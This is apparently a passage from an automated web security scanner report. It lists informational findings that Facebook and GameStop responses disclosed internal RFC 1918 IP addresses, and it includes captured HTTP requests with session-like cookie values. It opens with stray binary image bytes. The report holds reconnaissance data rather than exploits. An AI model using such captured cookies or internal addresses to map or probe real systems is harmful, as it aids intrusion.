...IHDR...2...2.....).x.....PLTE;Y.j.....:X.......s..:X.Jf.=[.e}.Fc.?]....=Z....@]....bz.......b{.......<Z....f~.9W.C`....?\.Ys....<Z...._x.bz.>\....Ql.r.....>[.j..............<Y.......h.d|.
...[SNIP]...

24.221. http://www.facebook.com/mobile previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/mobile

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.88.40

Request

Response

24.222. http://www.facebook.com/mobile/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/mobile/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.124.65

Request

Response

24.223. http://www.facebook.com/pages/create.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/create.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.125.46

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php%3Fref_type%3Dsitefooter; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.125.46
X-Cnection: close
Date: Tue, 19 Jul 2011 14:58:29 GMT
Content-Length: 32607

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/pages\/create.php";window._EagleEyeSeed="F3jP";</script><
...[SNIP]...

24.224. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.147.40

Request

Response

24.225. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.155.33

Request

Response

24.226. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.23.43

Request

GET /plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fabout-bing%2fbing-news%2f1hhlkld1b%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/videos/watch/about-bing/bing-news/1hhlkld1b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

24.227. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.79.57

Request

GET /plugins/like.php?action=recommend&api_key=140669015975185&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df31a2e41bc%26origin%3Dhttp%253A%252F%252Fwww.ticketmaster.com%252Ffc54d770c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%3A%2F%2Fo.socl.be%2Fnbl0lg03&layout=standard&locale=en_US&node_type=link&ref=tmus67EventLikeButton-1287641246826c&sdk=joey&show_faces=true&width=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ticketmaster.com/event/000043582C516D43?artistid=736365&majorcatid=10001&minorcatid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

24.228. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.86.30

Request

Response

24.229. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.29.53

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fsharethis&send=false&layout=standard&width=450&show_faces=true&action=like&colorscheme=light&font&height=80 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://sharethis.com/account/signin-widget
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; _e_FxZX_6=%5B%22FxZX%22%2C1310603126425%2C%22act%22%2C1310603126424%2C7%2C%22cancel%22%2C%22click%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2FBranchOutApp%3Fsk%3Dapp_131479520210618%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C717%2C213%2C20%2C1008%2C16%5D

Response

24.230. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.190.34

Request

Response

24.231. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.15.53

Request

GET /plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fabout-bing%2fbing-travel%2f1hhlv9sb0%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/videos/watch/video/bing-travel/1hhlv9sb0?from=us&FORM=L8SP87
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

24.232. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.33.45

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fsharethis&send=false&layout=standard&width=450&show_faces=true&action=like&colorscheme=light&font&height=80 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://sharethis.com/privacy
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; _e_FxZX_6=%5B%22FxZX%22%2C1310603126425%2C%22act%22%2C1310603126424%2C7%2C%22cancel%22%2C%22click%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2FBranchOutApp%3Fsk%3Dapp_131479520210618%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C717%2C213%2C20%2C1008%2C16%5D

Response

24.233. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.115.39

Request

Response

24.234. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.121.48

Request

Response

24.235. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.186.65

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dff535ced%26origin%3Dhttp%253A%252F%252Fwww.bing.com%252Ff312b68508%26relation%3Dparent.parent%26transport%3Dpostmessage&font=segoe%20ui&href=http%3A%2F%2Fwww.bing.com%2Fcommunity%2Fsite_blogs%2Fb%2Ftravel%2Farchive%2F2011%2F07%2F19%2Fputting-the-fun-in-funiculars.aspx&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=true&width=225 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/community/site_blogs/b/travel/archive/2011/07/19/putting-the-fun-in-funiculars.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

24.236. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.1.57

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fsharethis&send=false&layout=standard&width=450&show_faces=true&action=like&colorscheme=light&font&height=80 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://sharethis.com/register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; _e_FxZX_6=%5B%22FxZX%22%2C1310603126425%2C%22act%22%2C1310603126424%2C7%2C%22cancel%22%2C%22click%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2FBranchOutApp%3Fsk%3Dapp_131479520210618%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C717%2C213%2C20%2C1008%2C16%5D

Response

24.237. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.14.60

Request

GET /plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fabout-bing%2fbing-maps%2f1hhryc81i%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/videos/watch/video/bing-maps/1hhryc81i?from=us&FORM=L8SP88
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

24.238. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.26.38

Request

Response

24.239. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.15.41

Request

GET /plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fabout-bing%2fbing-video%2f1hh72z4pd%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/videos/watch/about-bing/bing-video/1hh72z4pd
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

24.240. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.204.58

Request

GET /plugins/like.php?app_id=134781006600189&href=http://www.facebook.com/pages/The-Cabinet-Factory/138334366222901&send=false&layout=box_count&width=55&show_faces=true&action=like&colorscheme=light&font=tahoma&height=60 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.thecabinetfactory.com/
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response

24.241. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.41.44

Request

GET /plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fabout-bing%2fbing-shopping%2f1hhb0790y%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/videos/watch/video/bing-shopping/1hhb0790y?from=us&FORM=L8SP89
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

24.242. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.255.25

Request

Response

24.243. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.70.46

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.bing.com%2Ftravel%2Fplaces%3Fg%3Dtravel_destinations%26amp%3BFORM%3DFBVSLK%26amp%3Bmkt%3Den-US&ref=FBVSLK&height=35&width=399&send=false&layout=standard&show_faces=false&action=like&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/travel/places?FORM=TRABDT&g=travel_destinations
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

24.244. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.133.36

Request

GET /plugins/like.php?href=http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html&layout=standard&show_faces=false&width=190&font=arial&colorscheme=light&ref=blogent HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response

24.245. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.190.59

Request

GET /plugins/likebox.php?api_key=105579996199059&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3c7c495b6eb54c%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff2c50e859711ee2%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=false&height=62&href=http%3A%2F%2Fwww.facebook.com%2Ffansnap&locale=en_US&sdk=joey&show_faces=false&stream=false&width=225 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fansnap.com/
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response

24.246. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.255.43

Request

Response

24.247. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.22.38

Request

Response

24.248. http://www.facebook.com/privacy/explanation.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/privacy/explanation.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.113.53

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprivacy%2Fexplanation.php; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.113.53
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:54 GMT
Content-Length: 28323

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/privacy\/explanation.php";window._EagleEyeSeed="O3Ue";</s
...[SNIP]...

24.249. http://www.facebook.com/r.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/r.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.108.49

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.108.49
X-Cnection: close
Date: Tue, 19 Jul 2011 14:58:57 GMT
Content-Length: 30768

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/r.php";window._EagleEyeSeed="TYhN";</script><noscript> <m
...[SNIP]...

24.250. http://www.facebook.com/r.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/r.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.106.37

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.106.37
X-Cnection: close
Date: Tue, 19 Jul 2011 15:01:04 GMT
Content-Length: 30713

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/r.php";window._EagleEyeSeed="UZGh";</script><noscript> <m
...[SNIP]...

24.251. http://www.facebook.com/terms.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/terms.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.101.65

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.101.65
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:54 GMT
Content-Length: 44962

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/terms.php";window._EagleEyeSeed="2lBU";</script><noscript
...[SNIP]...

24.252. http://www.gamestop.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gamestop.com
Path:	/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.20.202.38

Request

Response

HTTP/1.1 200 OK
X-Cnection: close
